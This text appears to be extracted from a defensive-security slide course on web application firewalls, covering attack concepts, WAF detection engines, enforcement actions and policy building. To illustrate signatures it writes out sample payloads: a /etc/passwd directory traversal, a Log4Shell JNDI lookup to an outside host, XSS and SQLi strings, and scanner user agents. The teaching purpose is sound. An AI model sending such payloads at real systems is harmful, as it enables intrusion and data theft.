The WAF book (Web App Firewall )

70295
©
“Man’s biggest obstacle is he himself” LR

70295
©
Practical Defensive Security
for Security Engineers
Ref: 052921DSMM-TWB-HB-V1.P, SOT:S,B.
Web App Firewall
By: Lior Rotkovitch
Comply to

70295
©
About: Lior Rotkovitch
1. High Tech since 1994 : QA, IT, Pre- Sale security, consulting security
2. New Product Introduction (NPI), for F5 ASM WAF since 2006
3. F5 SIRT, Sr Security Engineer since 2016: PSIRT,CSIRT
4. Content Developer - Since 2000
5. Community project:
SIRT.club – promote defensive security.
gohitech – leveraging high tech culture.
▪ Email: lior.rotkovitch@gmail.com
▪ Twitter: @rotkovitch
▪ LinkedIn: Lior Rotkovitch
▪ Instagram: L.Rotkovitch

70295
©
1) Target
2) Attack
3) Security
4) Policy
5) Incidents
6) Architecture
7) Operations
8) Security management
9) Assessment
10) SIRT
Comply:
Learning objective:
• Understand the ecosystem 1,2,3
• Applying security value – 4
• When under attack – 5
• Security design – 6
• WAF SW sustaining – 7
• Security Operations – 8
• Evaluating WAF – 9
• Who is doing what - 10

70295
©
Web Application: The business enabler

70295
©
HTTP Response
HTTP Request
Web App Paradigm
THE
WEB
TCP/IP – Connection
Clients Web Application
Request
• Protocols
• Payload – Headers
• User input
Response
• Protocols
• Payload – Headers
• App output

70295
©
Clients
Router
Router Firewall
Internet
PC
Response
Request
Browser
WAF
Web App ecosystem – Classic
Application
Server/s
Web
Server/s
3 tiers model
Perimeter model
OPS
DEV
Database
Server/s
Data Center - On premises / Appliance
ADC
Web App

70295
©
DEV.SEC.OPS
NF
Web Application
Unknow User
Web Bot
Requests
Responses
ABSTRACTION LAYER/S
automated traffic
Application/s
Request
handler/s
AAA
Mobile app/ {API}
Database/s
DEV
Perimeter/Ingress
OPS
SIRT
Web Site
DEVOPS
App Mesh
Cloud private /public
Zone X
CI/CD
• Microservice
• Container
• Pods
Web App ecosystem - Modern
WAF NG
Mobile Users
Ads/ 3rd party services Partners
Valuable User
Valuable User
SIEM ≈
Analytics ∑
Internet
Edge

70295
©
Web app
CLOUD
App
Web app
Virtualization –OS/HW
INTERNET Hybrid
Cloud – Public / Private
On Perm – dedicate / shared
Application location
Multi Cloud
Web
Server
App
Server
Database
Server
DATA
CENTER
CLOUD

70295
©
Micros services Data storage
login CP mgmt
ID
Browse
Web applications
Web
Server
App
Server
Database
Server
Classic
• Monolith
Cart
D B
Pay
Request/ Response
Manager
Zone 1 Zone 2
Classic Vs Modern
Modern
▪ Mesh app
▪ Microservices
Monomesh
o Classic / modern
3rd

70295
©
{API}
Web Application
ABSTRACTION LAYER/S
Application/s
Request
handler/s
AAA
Database/s
SIEM ≈
{ API }
{ API }
{ API }
Web App
Admin
Mobile client App
Mobile Browser
{ JSON }
{ JSON }
[Text]
{ API }
{ API }
Mobile app/ {API}
Browser
{ API }
CLI
Data Plane API
Control Plane API
Integration API
Deploy API
Analytics ∑
API use cases
[QS/PD]
Reporting API
{API}

70295
©
Site Map
(app tree)
{ API }
[QS/PD]
MS
MS
{API} {API}

70295
©
HTTP Client Types
Device
OS
HTTP
Network
Tor
Devices:
• PC
• Laptop
• Tablet
• Mobile
• IoT
OS:
• Windows
• Linux
• MAC
• Android
• Containers
HTTP:
• Browser
• CLI tool
• Frameworks
• Scripting
• Mobile App
Networking – exit points
• ISP
• proxies
• VPN
• Tor
Networking media:
• Wire -> Router
• WiFi -> Router
• Mobile data
ISP
VPN
proxy
Clouds
WEB

70295
©
Aggregated 21.21k 23.57 36.72k
172.29.46.46 2.75k 3.05 4.08k
192.168.1.14 2.26k 2.51 5.27k
192.168.190.191 2.25k 2.50 3.10k
10.10.1.200 2.23k 2.48 4.64k
10.0.0.138 2.01k 2.23 2.82k
0
20
40
60
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
IP1 IP2 IP3 IP4 IP5
0
500
1000
1500
2000
2500
3000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
URL /
Expected Traffic Footprint
Top URL RPS Avr
/ 21.21k
/search.php 2.75k
/login.php 2.26k
/sell.php 2.25k
/user_login.php 2.23k
/forgot_pass 2.01k
Load % Numbers
CPU 70% 0/1/2
Memory 72% 80GB
Throughput 35% 11.7Mbps
RPS 25% 10k
GET / query.php HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
User-Agent: browser (Java/1.8.0_221)
Status: Online Performance: Ideal

70295
©
Hacking for fun and profit all the time

70295
©
Attack status brief
Type:
• Random
• Targeted Random
• Targeted
Motivation
• Fame Fun and Profit
• Just because they can
• New WAR battlefield
Execution:
• Vulnerability hunting
• DDoS
• Brute force
• Malware
• BotNet
• Automation
• More…
CLIENTS
THE
WEB

70295
©
Attack Elements
HTTP
Web Application
Database
App
Servers
Web
Servers
“Attack occurs when: attack agent is sending exploit to
execute the vulnerability that resides in the attack surface

70295
©
Web Application
HTTP
Application/s
Request
handler/s Database/s
Vulnerability
Vulnerability – is a software condition
(bug) with security implication that
create a risk to the application assets
Vulnerability examples:
• Code
• Configuration
• Design
• No ATF enforcement
Vulnerability: root cause security bug
Main reasons:
• Validation
• Functionality
• Limitations

70295
©
HTTP
Application/s
Request
Attack Surface
Attack surface examples:
1. Code – Function, library, URL, Parameter
2. Infrastructure – OS, servers, virtualization, keys,
3. System – hardware, network, devices
Vulnerability location
Attack Surface – the place where the
vulnerability exists. Also refer to the entry
point for the exploit or the meeting place
between the exploit and the vulnerability.
Web Application

70295
©
HTTP
Request
Attack Agent
Operate from:
• Clouds
• Mobiles
• PC/ tablet
• IoT
Request generator tool
Attack Agent – the software vehicle
that is used to sends the exploit to
the attack surface
Software Types:
• CLI
• Browser automation
• Client framework
Web Application
Application/s

70295
©
HTTP
Request
Exploit
Actual code that activate the vulnerability
Exploit – the code / pattern that
activate the vulnerability and allow
exploitation of the vulnerability.
Exploit types:
• POC exploit
• Exploitation exploit
• Weaponizing exploit – RCE
Web Application
Application/s

70295
©
HTTP
Request
Attack Vector
Attack technique and / or goal
Web Application
We use the same attack
elements for all the attacks. The
vector is the technique used to
achieve the goal
Goals:
• Deny service / impact performance – DoS
• Extract data from DB – SQLi
• Session stealing – XSS
• Account take over – brute force
Technique:
• DoS (floods, load)
• SQLi
• XSS
• Brute force
• Etc…
Application/s

70295
©
Threat Landscape - Traditional
Users / HTTP clients
App SRV
Web SRV
Server/s
Database SRV
App owner
Web Exploits
Hacker playground
Web Application
▪ SQL injection
▪ Directory traversal
▪ Cross site attack
..;-()
..;-()

70295
©
Threat Landscape - Modern
DEVOPS
partners
NF
Mobile Users
Ads/ 3rd party
services
Remote
employee
Web Bot
User
Requests
Responses
ABSTRACTION LAYER
Allowed
automated traffic
Application/s
Request
handler/s
Authorization
SIEM ≈
Analytics ∑
Mobile app/ API
Database/s
DEV
OPSSEC
INSIDER
HACKED
PURPOSE
BUILD BOTNET
Automation - battlefield
Cloud
${{:-}j
Internet
Cloud

70295
©
Web Application
HTTP
Attack Automation
Attack agent automation = Bot / Botnet
Exploit automation = scanner
Bot = AE automation
Attack surface automation = scanner
Vulnerability automation = Vulnerability hunting
AUTO

70295
©
Attack automation - Botnet – disturbed
Exploit
pool
Bot MASTER
Purpose build
Hacked
Infected
App A
App B
App C
App D
App A
App B
App C
App D
App D
App B
App C
App A
App D
App C
App B
App A
Site 3
Site 2
Site 1
©

70295
©
AMO – Attack Modus Operandi
App A
▪ Firepower
▪ Scheduler
▪ Parsing results
ISP
VPN
Tor
proxy
• Impersonating
• Multi purpose
• Evasions
▪ Infected
▪ Hacked
▪ purpose build
▪ Geolocations
▪ Random
▪ Morphing
AV: CAV
▪ Botnet
▪ Hive net
▪ Swarm net
E
HTTP IP

70295
©
• SQLi
• XSS
• LFI/ RFI
• RCE
• CSRF
Web Exploits
• BF
• CS
• PS
ATO
• Floods
• Loads
DDoS
BOT/S
BOTNET/S
Web Application
Attack Surface /s
Vulnerabilities
Exploit
Attack Agent
ATTACK AUTOMATION
AUTO
Summary

70295
©
Attack Traffic Footprint
0
500
1000
1500
2000
2500
3000
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
URL /
Top URL RPS Avr
/ 21.21k
/search.php 2.75k
/login.php 2.26k
/sell.php 2.25k
/noneexisting 2.01k
Attack Elements
▪ Vulnerability
▪ Attack Surface
▪ Attack Agent
▪ Exploit
▪ Attack Vector
▪ Attack Automation
GET /search.php?q=../../../../../../etc/passwd HTTP/1.1
Host: sirt.club
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/95.0.4638.54

70295
©
“Security is only as good as the arsenal you have at your disposal

70295
©
Web Application
Force
Dude
HTTP
CI/CD
WAF– Web App Firewall
❑ Allow
❑ Monitor
❑ Block
*D&P Security
WAF
*D&P= Detect & Prevent

70295
©
2. CONTROL PLAIN – SETTINGS
3. REPORTING - VISUALIZATION
DATA PLANE – ENGINES
1. DATA PLANE – ENGINES:
WEB APPLICATION
WEB CLIENTS
WAF SECURITY
ENGINEER
PARSER
ENGINE
TRAPS
ENGINE
ENFORCER
ENGINE

70295
©
Request engines phases in WAF
Application Firewall Engines
Parser (entities) Value
Verb (Method) GET
Protocol HTTP 1.1
URL /index.php
User-Agent: Mozilla/5.00 (Nikto/2.1.6)
(Evasions:None) (Test:007240)
Source IP 192.168.1.1
Time 01:32:44
Detections: Signatures - User Agent
Python-urllib/2.6
Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240)
Mozilla/4.0 (Hydra)
Prevention action
Alarm
Block page
Reset conn
GET / HTTP/1.1
Host: sirt.club
User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240)
Parser
Traps Enforcer
Web Application

70295
©
https://sirt.club/home/search.php?q=waf&cat=all
Protocol: https
Host: sirt.club
Path: /home/
Object: search.php
Query Sting:
Parameter name: q
Parameter value: cve
2nd Parameter name: cat
2nd Parameter value: all
Entities: - URL
Protocol: https
Host: sirt.club
Path /home/
Object search.php
Query Sting ?
Parameter name q
Parameter value waf
2nd Parameter name cat
2nd Parameter value all
REQUEST
Parser:
©
Parser engine results

70295
©
POST login.php HTTP/1.1
Host: www.sirt.club
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Accept-Language: en-US,en;q=0.9,he;q=0.8
Cookie: SESSION=2a59508d7509c6d2c21bbf5b
uname=meme&pass=god123
POST REQUEST
Post Data, Headers – Entities:
WEB CLIENTS
WEB APP
Entities
Host: sirt.club
Method: POST
HTTP version: 1.1
URL: login.php
Content-Length: 32
Content-Type application/x-www-form-urlencoded
Param 1 uname
Param 1 value meme
Param 2 pass
Param 2 value god123
POST Request Parsing
©
• HTTP headers
• Post data
https://sirt.club/login.php

70295
©
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 13:53:00 GMT
Server: Apache X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, must-revalidate, max-age=0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8326
Keep-Alive: timeout=5
Content-Type: text/html; charset=UTF-8
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible"
content="IE=Edge"/>
<meta charset="UTF-8" />
<title>SIRT Club: Security Incident Response Teams
Club</title>
<script type="text/javascript">
</script>
</head>
<body>
<div id="logo">
 Text 
</body>
</html>
Entities
Response
Status Code
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 13:53:00 GMT
Response body
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<Body>
SIRT protectors of the realm
</Body>
</HTML>
HTTP Response Parser
WEB CLIENTS
WEB APP
RESPONSE
Payload
(headers)
Protocol
Server
output
©

70295
©
TRAPS -> DETECTIONS:
Signatures - Pattern matching
Anomaly - Aggregation and thresholds
Client Interrogation - HTTP client inspection
Restrictions - Allow / Block lists
Protocol
Payload
User input
@
PARSER - ENTITY
©

70295
©
1.SIGNATURES
3.RESTRICTIONS
2.ANOMALY
4.CLIENT INTERROGATION
WEB CLIENTS
ENTITIES DETECTIONS PREVENTION ACTION
PROTECTION ELEMENTS (PE)
WEB APP
Traps
Protocol
Payload
User input
Parser Enforcer

70295
©
Definition: Parten matching engine
Matching known words / key words on entities
• Pros
• Powerful pattern matching engine (IPS)
• Block know exploits
• Virtual patching & Leak prevention
• Security visibility – export detection
• Cons
• False positives
• Management time
• Consuming resources
Signatures Attacks: Web Exploit, Bot UA, SQLi, XSS,
LFI,RFI, Command Execution, Predictable
Resource etc
GET /search.php?q=EXPLOIT HTTP/1.1
Host: sirt.club
User-Agent: Mozilla/5.00
Signature example
▪ Informational signature – User agent, defaults, general words
▪ Generic exploits signature – common web exploits
▪ Specific exploit signature – CVE/ real known exploits

70295
©
Verb (Method) GET
Protocol HTTP 1.1
URL /query.php
User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221)
Source IP 192.168.1.1
WAF User Agent signature
Python-urllib/2.6
Apache-HttpClient/4.5.7 (Java/1.8.0_221)
Mozilla/4.0 (Hydra)
Signature: Informational
GET / query.php HTTP/1.1
Host: sirt.club
SIGNATURES
ENTITIES DETECTIONS
WEB APP
©

70295
©
POST /submit.php HTTP/1.1
Host: sirt.club
Accept: text/html,application/,*/*;
Content-Length: 142
Cookie: SESSION=aafa5676ce60d1b33b58c0dd6de6fa87;
{“secret_book”: 6.9, “tlv_book”: [<scripts>alert('lala')<script>]}
Signature – POST Data
<scripts>alert('lala')<script>
<scripts>
alert('')
<script>
‘ or 1 =1
Parser (entities)
Host: sirt.club
Method: POST
HTTP version: 1.1
URL: submit.php
Accept: text/html, image/webp, */*
POST Data
{“my_book”: 1.1, “tlv_book”:
[<scripts>alert('lala')<script>]}
SIGNATURES
Signature - Generic exploits
WEB APP

70295
©
Signature – Specific Exploit
Application Firewall
Verb (Method) GET
Protocol HTTP 1.1
URL GUI.php${jndi:ldap://webappz.com}
Source IP 192.168.1.1
Time 01:32:44
CVE signatures
/............winntwin.ini
..../..../boot.ini
${jndi:ldap://webappz.com}
${jndi:
Prevention action
Alert
Block page
Reset conn
GET /GUI.php${jndi:ldap://webappz.com} HTTP/1.1
Host: sirt.club
Web App
Application
Server/s
Web
Server/s
Database
Server/s

70295
©
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2024 13:53:00 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
<meta charset="UTF-8" />
<title>SIRT Club: Security Incident Response Teams
Club</title>
<script type="text/javascript">
</script>
</head>
<body>
<div id="logo">
 Text 
</body>
</html>
Response
Status Code
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 13:53:00 GMT
Response body
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<Body>
Page Test 
</Body>
</HTML>
Signature - HTTP Response headers
WEB CLIENTS
RESPONSE
Headers
Response
body
Signature – Response Headers
Apache/2.1 (Unix) PHP/7.1.2
WEB APP

70295
©
HTTP/1.1 200 OK
Date: Sun, 29 May 2022 13:13:13 GMT
Server: Apache/2.1 (Unix) PHP/7.1.2
Keep-Alive: timeout=15, max=99
Content-Type: text/html
 
Warning: Supplied argument is not a valid MySQL
result resource in /var/htdocs/myapp/ on line
9 
 
Warning: Cannot add header information - headers
already sent by (output started at
/var/htdocs/myapp/login.php:9) in /var/htdocs/myapp/
 on line 18 
Parser - Response
Response Status
Code
HTTP/1.1 200 OK
Date: Sun, 29 May 2022 13:13:13 GMT
Server: Apache/2.1 (Unix) PHP/7.1.2
Response body
 
Warning: Supplied argument is not a valid
MySQL result resource in /var/htdocs/myapp/
 on line 9 
 
Warning: Cannot add header information -
headers already sent by (output started at
/var/htdocs/myapp/login.php:9) in 
/var/htdocs/myapp/ on line 18 
RAW HTML Response
Signature – Response Body
“Supplied argument is not a valid MySQL result
resource in”
Signature - HTTP Response Body
FORM name="search" action="search.php" method="GET">
<INPUT type=HIDDEN name="">
<INPUT type="text" name="query" size=25 value="">
<INPUT TYPE=submit NAME="" VALUE=“Search">
</FORM></

70295
©
1.SIGNATURES
3.RESTRICTIONS
2.ANOMALY
Protocol
Payload
User input
Traps
Parser Enforcer
WEB CLIENTS
WEB APP

70295
©
Anomaly
• Pros:
• Easy to use
• Effective automation detection
• Very effective in noisy attacks
• Clear indication of automation
• Cons:
• Needs fine tune for each site
• Advance usage needs knowledge and
experience
Anomaly example
▪ Request per second (RPS)
▪ Failed log in (FLI)
▪ Session opening
▪ Other detections : signatures, metachars etc
Definition: Data aggregation engine
Measure exceeding defined threshold
Attacks: Brute force , credential stuffing
, application DDoS, floods etc
Above attack
Below ok

70295
©
Internet
IP (Parser ) 5 min 20 min 1 hour AVG
10.0.0.138 50 60 180
192.168.1.1 180 0 0
172.29.44.6 400 350 3000
172.29.46.9 250 100 1000
10.1.1.1 1800 1200 800
192.168.24.24 0 100 150
Aggregated data – Policy limit per IP
Source IP: ANY @ 5 Min RPS limit
Min 220
Max 280
ANOMALY
Detection: Anomaly increase in RPS form IP’s

70295
©
Anomaly – increase in RPS on URL’s
Internet
URL RPS 5 min 20min 1 hour
AVG
Sell.php 500 600 1800
Help.php 120 100 100
Login.php 3000 6500 8000
Contact.us.php 1500 1000 800
1800 1800 1800
Promo.page.php 10 100 150
Source IP: ANY @ 5 Min RPS limit
Min 220
Max 280

sell.php
login.php
Contact.php

70295
©
IP (Parser )
Sig count
5 min
Sig count
20min
Sig count
1H
10.0.0.138 500 600 1800
192.168.1.1 20 50 100
172.29.44.6 0 1 0
172.29.46.9 0 0 4
10.1.1.1 4 4 4
192.168.24.24 1 1 1
Aggregated data – Policy limit: Signatures per IP
Source IP: ANY @ 5 Min Max signature from IP / 5min
Min 20
Max 80
Post max 150 -> shun for 12 hours
ANOMALY
Internet
Detection: Anomaly increase Sig from IP
©

70295
©
IP (Parser )
Current
FLI /5min
60min
FLI
10.0.0.138 60 180
192.168.1.1 0 0
172.29.44.6 35 40
172.29.46.9 100 1000
10.1.1.1 1800 3000
192.168.24.24 10 150
Aggregated data – Policy limit: FLI per IP
Source IP: ANY @ 5 Min FLI/IP over 5 min limit :
Min 300
Max 1000
Internet
Detection: Anomaly increase in FLI form IP’s
Fail Login
Try Again
ANOMALY
IP X
IP Y
IP Z

70295
©
Anomaly – increase in FLI from Geo
Internet
IP IP to GEO Current
RPS
10m RPS
10.0.0.138 Country U 60 180
192.168.1.1 Country X 0 0
172.29.44.6 Country Y 350 3000
172.29.46.9 Country W 100 1000
10.1.1.1 Country V 1800 1800
192.168.24.24 Country Z 100 150
Source IP: country @ 5 Min RPS limit
Min 300
Max 1000
IP’s

70295
©
0
2
4
6
8
10
12
14
16
18
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
IP’s/URL’s
Anomaly - Fixed Vs Ratio
0
5
10
15
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
IP/URL
App 1

70295
©
• Pros:
• A powerful and granular allow / deny
alerting and enforcement list
• Provides a schema for ETF
• Provide a schema for user input validation
• Holistic security
• Cons:
• Needs fine tune – false positive
• Needs management
• Block on first occurrence is limited
Hit count then block is the best
Restrictions
Matching Allow / Block lists Restriction examples:
▪ Characters sets
▪ RFC & evasion
▪ Flow
▪ Structure
Definition: structure restriction engine
Attacks: SQLi, XSS, directory traversal,
evasions etc
Structure Allow
Schema Block
Methods Allow
RFC Block
Encoding Block
Protocol WebSocket Allow
Protocol HTTP 1.0 Block

70295
©
Restrictions – size
Size Min Chars Max chars
GET Param value Min 3 chars Max 130 chars
Parser
(entities)
Value Size - found
Verb (Method) GET
Protocol HTTP 1.1
Parameter name q
Parameter value longlonglonglonglonglonglonglonglonglonglong
longlonglonglonglonglonglonglonglonglonglong
longlonglonglx00nglonglonglonglonglonglonglo
nglong
136 chars
Source IP 192.168.1.1
Time 01:32:44
http://sirt.club/search.php?q=longlonglonglonglonglonglonglon
glonglonglonglonglonglonglonglonglonglonglonglonglonglonglon
glonglonglonglonglonglonglonglonglonglonglong
Host: sirt.club
Accept: text/html,application/,*/*;
Payload size policy
RESTRICTIONS

70295
©
Restrictions – HTTP RFC
RFC @ any request Policy – allow/ Deny
Header with no value Block
Double host header Block
HTTP verbs: POST Get HEAD Block
Null in request Block
Parameter value with ' Block
Protocol versions 1.1 Allow
Protocol versions 1.0 Block
Verb (Method) Head
Protocol HTTP 1.0
Parameter name q
Parameter value mc’mer
Host header 172.29.46.23
SIRT.CLUB
Time 11:11:11
Header123 _____
Accept text/html,application/,*/* %00;
RESTRICTIONS
Options /search.php?q=mc’merHTTP/1.0
Host: SIRT.CLUB
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114
Safari/237.36
Accept: text/html,application/,*/* %00;
Host: 172.29.44.44
Header123:

70295
©
Restrictions – Meta characters
Verb (Method) GET
Protocol HTTP 1.1
Session D5!8ec55996a207ed
Parameter name q
Parameter value Mc’dogal
Source IP 1.1.1.1
Time 01:11:11
http://sirt.club/search.php?q=Mc’dogal
RESTRICTIONS
Metachar for
Any parameter
value
Encoding
ASCII
Policy – allow/
Deny
# %35 Allow
$ %36 Allow
% %37 Allow
& %38 Allow
' %39 Deny
/ %47 Deny
< %60 Deny

70295
©
Search Engine name FQDN Count /1 day
Google .googlebot.com 150
Bing .msn.com 160
Ask .ask.com 10
GET /coffee HTTP/1.1
Host: sirt.club
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Connection: close
DNS Server
rDNS- is the IP in the result
match the IP arriving
Source IP – x.y.z.z
Source IP – Y.Y.Y.Y
1.
2.
3.
5.
4.
Restrictions – rDNS query

70295
©
HTTP/1.1 200 OK
Date: Mon, 29 May 2023 10:10:10 GMT
Keep-Alive: timeout=15, max=99
Content-Type: text/html
 
 /var/htdocs/myapp/ 
Credit cards numbers:
 001001001001 
 001002001003 
 001006001004 
 001006001771 
HTTP Response sanitation
Preventing :
• Data leakage
• Credentials spilling
RESPONSE
 /var/htdocs/myapp/ 
Credit cards numbers:
 user1@email1.com: 123456 
 user2@email1.com: qwerty 
 goduser1@email1.com: LOL123 
 uadmin1@email1.com: password 
REQUEST
Pattern Occurrences > 2
Pattern Occurrences > 3
N/A

70295
©
Client Interrogation
Who is the client ?
1. Simple bot
2. Full browser bot
3. Full human bot
Definition: HTTP client inspection for
understating who is the HTTP client
• Pros
• Helping with identifying bots/ automation
• Examining Attack Agent
• Works beyond IP level
• Powerful with other detection
• Cons
• Add round trip, delay the load time
• Can be tricked
• No blocking
Types
I. CAPTHCA
II. Client capabilities L1-3
III. Source ID (SID)
Attacks: bot /botnets for any attacks.
Automated traffic Attack agents

70295
©
User Browser
WAF - CI
App
First request GET /sell.php
GET /sell.php (not verified)
Client – interrogation
Return interrogation results
Forward request
HTTP Response (verified)
interrogation Tests:
• CLI ?
• Support JS?
• Support cookie ?
• Mouse movements ?
• Event sequence ?
• UA fit resolution ?
• Framework ?
GET /img.png (verified )
GET /img.png (verified)
HTTP Response (verified)
HTML rendering
interrogation results :
If failed – drop / block request
if pass – forward
Client interrogation – concept

70295
©
Type the words :
SIRT#1
AUTO
Type the words :
SIRT#1
??!?!?!!
SIRT#1
©
Human
Not human
Client interrogation I : CAPTHCA

70295
©
IP:Y
IP:X
Which AA?
IP:A
Client interrogation
Client interrogation II : Capabilities
Only browsers are allowed here
CI results Allowed
Browser Yes
CLI No
JS capable Yes
Cookie set Yes

70295
©
IP:Y
IP:X
IP:Z
Client interrogation III : SID
IP:X SID: 9883 10 RPS
IP:X SID: 1253 50 RPS
IP:Z SID: 4948 100 RPS
IP:Z SID:1151 20 RPS
IP:Z SID: 2222 12 RPS
IP:Y SID: 2873 0 RPS
SID: 9883
SID: 1253
SID: 2873
SID: 1151 SID: 4948
SID: 2222
Measuring IP/SID Binding
Client interrogation
Who are you ?

70295
©
TRAPS -> DETECTIONS:
Signatures - Pattern matching
Anomaly - Aggregation and thresholds
Client Interrogation - HTTP client inspection
Restrictions - Allow / Block lists

70295
©
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT INTERROGATION
ALERT
BLOCK
LIMIT
FOLLOW UP
WEB CLIENTS
Protocol
Payload
User input
Traps
Parser Enforcer

70295
©
❑ SMS
❑ Messaging – slack
❑ Email
ALERT
To: WAF admin
❑ DASHBOARD – ALERT / CRITICAL
❑ GRAPHS – VISUAL
❑ STATISTICS – TABLES
❑ LOGS – REQUEST LOGS
Alert – the most basic but the most important. The money time
And security visibility feedback loop
Browse
r
User
IP
Attacker
©
WAF Reporting (GUI)
External alert utility

70295
©
Your traffic is violating the site policy.
If this continues, please contact our support
111-111
Block ID: 10ABC
TCP FIN / RESET
Drop connection
Semi blocking:
Scrubbing / Stripping / Cloaking
Browse
r
BLOCK
This request has been blocked
To: End Users
©
Blocking page

70295
©
• Limiting rate of RPS on specific IP
• Limiting RPS on site
• Limiting RPS on specific URL
• Limiting time
• Limiting access – 4 hours ban
LIMIT
IP
q
search.php
index.php
IP
• Rate limit on the client side
Advantages
▪ Slowdown / Delay attack
▪ Less aggressive then blocking
▪ Typically works on anomalies
• Rate limit on the server side

70295
©
Send users to honeypot for inspections
Resent browser to main page
FOLLOW UP Advantages
▪ Delay attack
▪ Hides blocking actions
▪ Investigating activity
302: HOME
Fake app keep them busy
Redirect
Honeypot

70295
©
Your traffic is violating the site policy.
If this continues, please contact our support
111-111
Block ID: 10ABC
Browser
This request has been blocked
Wrong username password,
please try again :
Login
Forgot password
Password
User:
Home | Buy| login| Help
Retaliation
Not available
Home | Buy| login| Help
Please try again later
Soft Block
Hard block
FOLLOW UP

70295
©
PARSER ENGINE TRAPS ENGINE ENFORCER ENGINE
REQUEST ARRIVE
WAF DATA PLANE REQUEST/RESPONSE PROCESS
PARSER ENGINE
TRAPS ENGINE
ENFORCER ENGINE
RESPONSE
ARRIVE
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT
INTERROGATION
Protocol
Payload
User input
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT
INTERROGATION
Protocol
Payload
User input
ALERT
BLOCK
LIMIT
FOLLOW UP
ALERT
BLOCK
LIMIT
FOLLOW UP

70295
©
Traffic visibility to control the users, Foe or Friend
*

70295
©
WAF – inline traffic inspector
WEB APPLICATION
Application/s
Request
handler/s
Database/s
Expected Traffic Footprint
Attack Traffic Footprint
No Services
for you
WEB APP OWNER
✓ Allow valuable traffic
✓ Stop attack
Welcome P D E
©

70295
©
Entity
1.PROTOCOL
2.PAYLOAD
3.USER INPUT
Detections
1.SIGNATURES
2.ANOMALY
3.RESTRICTION
Prevention
1.ALERT
2.BLOCK
3.LIMITING
4.FOLLOW UP
E D P
WAF – PE and Rules
Rule
©

70295
©
Rules Concept
PROTOCOL
PAYLOAD – HEADERS
USER INPUT
SIGNATURES
ANOMALY
RESTRICTIONS
ALERT
BLOCK
LIMIT
FOLLOW UP
• Detection
ENFORCER
TRAPS
PARSER
E D P
• Entity • PA
user input parameter value Signature SQLi select * from Blocking page

70295
©
WAF policy
Policy
PE
• Entities
• Detections
• Prevention
E D P
E D P
E D P
• Rule
• Rule sets
Rule
Rules
Protection elements
Protection rule
Protection policy

70295
©
❑ Allow
❑ Monitor
❑ Block
Brute force Prevention Rules
E D P
E D P
E D P
E D P
P
ADDoS Prevention Rules
Vulnerability Hunting Prevention Rules
E D P
Bot/Botnet Prevention Rules
APP
©
E D P
E D P
E D P
E D P
E D

70295
©
A. What you want
B. How do to it
E
D
P
?
?
?
• App Risk level
• Human labor
• WAF capabilities
WAF policy – building

70295
©
WA-CAV
BRUTE FORCE
ADDoS
WEB EXPLOITS
AUTOMATED
ATTACKS
Brute force Rules
ADDoS Rules
Web Exploits Rules
Bot/Botnet Rules
WAF POLICY
Policy Goal: rule sets to mitigate WA-CAV
Risk

70295
©
Labor
How many people
• Knowledge
• Skill sets
• Experience
Working hours: 1 person per 20 base polices
Off hours: 1 person – monitoring / acting
• Web app type : traffic, users, criticality
• Polices number / apps (total)
• Policy complexity – number of PE’s (features)
• Coverage – follow the sun
*Estimations

70295
©
Capabilities
•SQLi
•XSS
•LFI/ RFI
•RCE
•CSRF
Web Exploits
•BF
•CS
•PS
ATO
•floods
•Loads
DDoS
Parser:
• HTML
• HTTP
• API
• JSON
Detections :
• Signatures
• Anomaly
• Restrictions
• Client intg
Enforcer
• Alert
• Block
• Limit
• Follow up
Edge / Perimeter / Mesh
Vendor A
Vendor B
Vendor C
Vendor X

70295
©
►What you want
►How do to it
E
D
P
?
WAF policy – building

70295
©
How to build a policy
Create Rule
Verify Rule
Enforce Rule
A good rule:
▪ No false positive
▪ Blocking the defined criteria
E D P
C V E
Pass traffic:
• No hits – enforce
• Hits – keep in alert mode
• Define the entity/ies
• Configure the detections
• Apply prevention
action (beyond alert)

70295
©
Ways to build polices
➢ Manual
➢ Heuristics
➢ Statistics
➢ Aggregations
Protocol
Payload
User input
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT
INTERROGATION
ALERT
BLOCK
LIMIT
FOLLOW UP
Define entity
